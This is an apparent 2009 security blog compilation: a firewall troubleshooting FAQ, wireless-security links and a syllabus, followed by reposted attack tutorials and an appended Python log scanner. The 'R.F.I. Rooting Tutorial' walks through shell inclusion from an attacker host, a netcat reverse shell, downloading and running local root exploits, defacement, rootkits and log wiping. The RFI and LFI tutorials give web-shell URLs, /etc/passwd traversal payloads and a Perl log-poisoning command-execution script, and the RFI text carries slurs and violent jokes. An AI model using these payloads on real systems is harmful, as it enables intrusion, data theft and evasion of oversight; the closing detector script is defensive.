Monday, January 26, 2009

FAQ from firewall admin to the client for troubleshooting purposes

Jan 13 2009, 09:22 AM

Let's say you are working as a firewall admin. One day, client A calls you and tells you that he has a problem accessing an application on server B.
I was wondering, for anyone here working as firewall support, what are the questions that you need to ask if an incident like this happens to you? I'll list some of them and the purpose why the information is needed; maybe you could add or give better suggestions.

1. What is the firewall name/IP address? (so we know which firewall is involved in this incident)
2. What are the source and destination IP addresses? (so we can check whether the traffic hits the firewall or not)
3. Traceroute result from source to destination IP. (so we know if the traffic was dropped somewhere else)
4. What is the incident number? (if you are using a ticketing system, so we can keep track of what happened)
5. Has this worked before? (if it worked, possibly some changes have been made to the firewall or server)

Blake @ Jan 13 2009, 03:22 PM


6. What application and protocol are they using to access the server?
7. Can they access any other server using the same application and protocol?
8. Has the client or host made any upgrades or patches recently?
9. What version of VPN software is the client using?
Also, I always start a remote desktop session using logmein.com or some other software. It speeds up the entire process when you can see the client's desktop.

packet @ Jan 19 2009, 11:31 PM

And of course:

10: when did it stop working?
11: Reboot!

Comparison of Wireless LAN Standards

http://www.mobileinfo.com/wireless_lans/802.11a_802.11b.htm

SANS InfoSec Reading Room - Wireless Access

Various great papers on Wireless Security can be found here...

Crack WEP?

How To Crack WEP - Part 1 - 3
How To Crack WEP - Part 1: Setup & Network Recon

How To Crack WEP - Part 2: Performing the Crack

How To Crack WEP - Part 3: Securing your WLAN

WEP: Dead Again, Part 1
Michael Ossmann 2004-12-14

WEP: Dead Again, Part 2
Michael Ossmann 2005-03-08

How RFID Works

Long checkout lines at the grocery store are one of the biggest complaints about the shopping experience. Soon, these lines could disappear when the ubiquitous Universal Product Code (UPC) bar code is replaced by smart labels, also called radio frequency identification (RFID) tags. RFID tags are intelligent bar codes that can talk to a networked system to track every product that you put in your shopping cart.

Read more here...

http://electronics.howstuffworks.com/rfid.htm/printable

Wireless and Mobile Security/Keselamatan Tanpa Wayar dan Mudahalih

Subject Name: Wireless and Mobile Security

Subject Code: IWD 2243

Status: Core Major (Teras Major)

Level: Diploma

Credit hours: 3 hours

Pre-requisite: IWD2323 - Computer Security

Assessment: Final examination - 40%; Mid-semester test - 20%; Course work - 40%

Semester Taught: Year 2, Semester 2

Synopsis

The use of wireless networks and mobile communications has become a major trend these days. Wireless and mobile communications offer many benefits such as portability and flexibility, increased productivity, and lower installation costs. Wireless technologies cover a broad range of differing capabilities oriented toward different uses and needs. Wireless local area network (WLAN) devices, for instance, allow users to move their laptops from place to place within their offices without the need for wires and without losing network connectivity. Mobile and wireless security is therefore of high priority. The security measures taken depend on the different protocols, standards, techniques and systems available. A brief introduction to security protocols, standards and corresponding technologies is given in this subject, particularly on 2G, 2.5G, 3G and wireless local area networks. Standards like WAP, IEEE 802.11 and Bluetooth are included, as well as awareness of the vulnerabilities, threats and countermeasures associated with these wireless technologies.

Learning Objective

Aim

In this course, students should be able to gain a solid understanding of the security weaknesses of and threats to wireless LANs, understand wireless network design and deployment, implement the best security techniques currently available, be introduced to the latest security software and protocols for wireless LANs, and be introduced to the best resources for wireless security issues and decisions in the organization.

Course learning Outcomes

Upon successful completion of the course, the students should be able to:

  1. Have a clear understanding of the full range of wireless technologies in common use and how to implement them safely.
  2. Understand how to secure wireless systems and prevent threats posed by hackers.
  3. Understand how wireless devices, components and protocols work, how to determine the best wireless solutions for their environments, and how to implement, secure and maintain these solutions.

Monday, January 12, 2009

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.

Error Message %PIX-1-105009: (Primary) Testing on interface int_name result.
Explanation This is a failover message. This message reports the result (either "Passed" or "Failed") of a previous interface test. "(Primary)" can also be listed as "(Secondary)" for the secondary unit.

Recommended Action None required if the result is "Passed." If the result is "Failed," you should check the network cable connection to both failover units, that the network itself is functioning correctly, and verify the status of the standby unit.

http://www.cisco.com/univercd/cc/td/doc/product/iaabu/pix/pix_62/syslog/pixemsgs.htm

Friday, January 9, 2009

R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

=======================================================================
R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF)

Author: An@sA_StAxtH
Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com

For Cyber Anarchy (Nov. 2007)
=======================================================================

You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

The aim of this tutorial is to give a very general picture of the process of rooting
a Linux server with Safe Mod: OFF.

-

Suppose that we have found a site with R.F.I. vulnerability:

http://www.hackedsite.com/folder/index.html?page=

We can run a shell by exploiting Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt?

where evilscript.txt is our web shell that we have already uploaded to
our site. (www.mysite.com in the folder: shells)

After we enter the shell, first of all we will see the version of the kernel
at the top of the page or by typing uname -a in the command line.

To continue we must connect with a back connection to the box. This can be done in
two ways if we have the suitable shell.

We can use the Back-Connect module of the r57/c99 shell or upload a backconnector
in a writable folder.

In most of the shells there is a backconnection feature without needing to upload the
Connect Back Shell (or another shell in perl/c). We will analyze the first
way, which is inside the shell (in our example the shell is r57).

Initially we open NetCat and set it to listen on a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) in the
following way:

We will type 11457 in the port input (this is the default port for the latest versions
of the r57 shell). We can also use another port.

We press Windows Start -> Run -> and type: cmd
Then we go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat responds: listening on [any] 11457 ...

In the central page of the r57 shell we find, under the menu ::Net::,
back-connect. In the IP form we will type our IP (www.cmyip.com to see our IP if
we have a dynamic one).

In the Port form we will put the port that we opened and NetCat listens.

If we press connect, the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct, NetCat will give us a shell on the server.

Now we will continue to the rooting process.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root privileges on the box. Depending on the version
of the Linux kernel there are different exploits. Sometimes the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: www.packetstormsecurity.org | www.arblan.com
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder, which is a standard writable folder.

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.arblan.com/localroot/h00lyshit.c

where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (read the instructions of the exploit
before compiling).

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit

We need a very big file on the disk in order to run it successfully and get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation.

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are no runtime errors (maybe the kernel is patched or something is wrong with
the exploit run or the large file) we will get root.

To check if we got root:

id or

whoami

If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.

-

*

http://www.packetstormsecurity.org/papers/attack/rfitutorial.txt

RFI Tutorial (remote file inclusion)

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.

He creates four pages: blog.php, contact.php and gallery.php, along with index.php. This is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.
Code:
http://www.yodad.com/index.php?page=blog.php
http://www.yodad.com/index.php?page=contact.php
http://www.yodad.com/index.php?page=gallery.php
Let's take a look at the code for index.php

Code:
//html for header
//html for menu
<?php
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']

This means when we go to
Code:
http://www.yodad.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"
Code:
http://www.yodad.com/index.php?page=http://www.google.com
You would see the google home page instead of your dad's shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may have heard of "shells" (r57, c99, g00nshell, peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:
Code:
//html for header
//html for menu
<?php
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:

Code:
<?php
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.yodad.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:
Code:
http://www.yodad.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.

...

As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.
index.php:

Code:
<?php
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.

Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include:
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined, just make sure you define every variable that gets used.


There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

Switching.

Code:
<?php
$page = $_GET['page'];
switch($page){
    case "blog":
        include("blog.php");
        break;
    case "contact":
        include("contact.php");
        break;
    case "gallery":
        include("gallery.php");
        break;
    default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
        echo "Choose a page from our fine selection!1!!";
        break;
}
?>

https://per1ova.startlogic.com/showthread.php?t=594

LFI Tutorial (local file inclusion)

This tutorial will guide you through the process of exploiting a website through LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:
Code:
<?php
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not) it is very common to find in the www world.

Ok, now that we know why it is vulnerable, let's start to use this to our advantage. First let's take a look at how this gives us the ability to "browse" through the web server. Let's imagine there's a file called test.php inside the test directory; if you type victim.com/test/test.php it will retrieve that file, correct? Ok, but if the php code that we examined was in index.php we could also retrieve that file through victim.com/index.php?page=test/test.php, see what happened there? Now, if index.php was in victim.com/test/index.php and test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php. The ../ is called directory traversal; using that will allow you to go up in the directories.


Now that we can go up and down through the server, let's use it to access files that we are not supposed to. If this is hosted on a Unix server we can then possibly view the password file of the server; to do this you will have to type something like this (the number of ../ may vary depending on where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/passwd
If you don't know what to do with the content of /etc/passwd then continue reading! /etc/passwd is where the users/passwords are stored; a non-shadowed passwd file will look like this:



username:passwd:UID:GID:full_name:directory:shell

For example:


username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:


username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now an x and the encoded password is now in /etc/shadow (you will probably not have access to /etc/shadow because it is only readable/writeable by root, and /etc/passwd has to be readable by many
processes; that's why you have access to it).

You can also sometimes see something like this:



username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, it's also common to find vulnerable code like:
Code:
<?php
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../etc/passwd.php; that file doesn't exist, and you will see an error message, so you need to apply the null byte ():
Code:
victim.com/index.php?file=../../../../../../../../etc/passwd
With the null byte the server will ignore everything that comes after .



There are other ways to use the LFI exploit, so continue reading, the REAL fun is about to begin!


We will now try to run commands on the server; we will do this by injecting php code into the httpd logs and then accessing them through the LFI! To do this, first find out where the logs are stored; here are some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are, take a look at them and see what they store; in this example we will use a log that stores the "not found files" and the php code . You will then type in your browser victim.com/ and the php code will be logged because it "doesn't exist".

This possibly won't work, because if you look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will URL-encode the whole thing! So you'll need to use something else; if you don't have a script of your own you can use this perl script I've written:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold according to your victim site. If the vulnerable code is in victim.com/main/test.php you should change /folder/ to /main/, index.php= to test.php= and ../../../../../../../etc/httpd/logs/error_log to where the log is!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!


Last but not least we will take a look at how to use the avatar/image upload function found in a lot of web applications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web application DOESN'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image; to do this you'll need to use your favorite hex editor, or you can use the edjpgcom program (all you need to do is right click on the image, Open with..., then select the edjpgcom program and then just type the code). Ok, now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload, great; if not, check if it's on shared hosting, and if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image, all you need to do is take some time to browse through them until you find one!


After you have found one and have uploaded your image, here is the tricky part: you'll need to "create" an error on it (in order to find the server path to it)! Try for example to create a MySQL error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name; most of the time the name is similar to the domain name, but if that's not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image, right click on it and then Properties (write down the path to it); you're now all set up.

In your browser type this (again, the nr of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../home/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In other "words" it should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../home/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!

https://per1ova.startlogic.com/showthread.php?t=595
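As an added defensive example (not code from either tutorial above or their authors), the following Python script scans Apache access-log lines for the request shapes the RFI and LFI tutorials describe: remote URLs in an include parameter, directory traversal with or without a trailing null byte, double URL encoding, inclusion of the server's own log files, and PHP tags planted in a request or User-Agent for log poisoning. Host names, addresses and log lines are constructed.

```python
"""Flag file-inclusion attack attempts in Apache access logs (added example).

Detects the request shapes the RFI/LFI tutorials describe: remote URLs in an
include parameter, directory traversal, null-byte truncation, double URL
encoding, inclusion of the server's own logs, and PHP tags planted in a
request or User-Agent (log poisoning).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" format; hosts are fictitious.
SAMPLE_LOG = r"""
10.0.0.5 - - [09/Jan/2009:10:00:01 +0000] "GET /index.php?page=blog.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.6 - - [09/Jan/2009:10:00:02 +0000] "GET /index.php?page=http://evilsite.example/c99.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Jan/2009:10:00:03 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
10.0.0.8 - - [09/Jan/2009:10:00:04 +0000] "GET /index.php?page=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Jan/2009:10:00:05 +0000] "GET /nonexistent HTTP/1.1" 404 210 "-" "<?php passthru($_GET[cmd]); ?>"
10.0.0.9 - - [09/Jan/2009:10:00:06 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Stream wrappers that make include() fetch attacker-controlled content.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?|php|data|expect)://", re.I)
# Log files an attacker includes after poisoning them.
LOG_PATH = re.compile(r"/logs?/|(?:access|error)[_.]log", re.I)
# PHP open tag, as planted in a User-Agent or a request for a missing page.
POISON = re.compile(r"<\?(?:php\b|=|\s)")

def full_decode(value, rounds=3):
    """URL-decode until stable, so %252e (double-encoded '.') is seen as '.'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(target, user_agent):
    """Return the set of indicator tags for one request (empty set = clean)."""
    tags = set()
    # parse_qsl decodes one layer; full_decode strips any layers stacked on top.
    for _name, once in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = full_decode(once)
        if value != once:
            tags.add("double_encoded")
        if REMOTE_SCHEME.match(value):
            tags.add("rfi_remote_include")
        if "../" in value or "..\\" in value:
            tags.add("lfi_traversal")
            if LOG_PATH.search(value):
                tags.add("lfi_log_inclusion")
        if "\x00" in value:
            tags.add("null_byte_truncation")
    if POISON.search(full_decode(target)) or POISON.search(full_decode(user_agent)):
        tags.add("log_poisoning")
    return tags

def scan_log(text):
    """Parse combined-format lines and return only the suspicious ones."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real deployment should count these too
        tags = classify_request(m["target"], m["ua"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "tags": tags})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], sorted(hit["tags"]), hit["target"])
```

Feed it a real access log instead of SAMPLE_LOG to get the same tags per line; a `lfi_log_inclusion` hit from the same address that earlier produced a `log_poisoning` hit is the two-step pattern the LFI tutorial describes.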
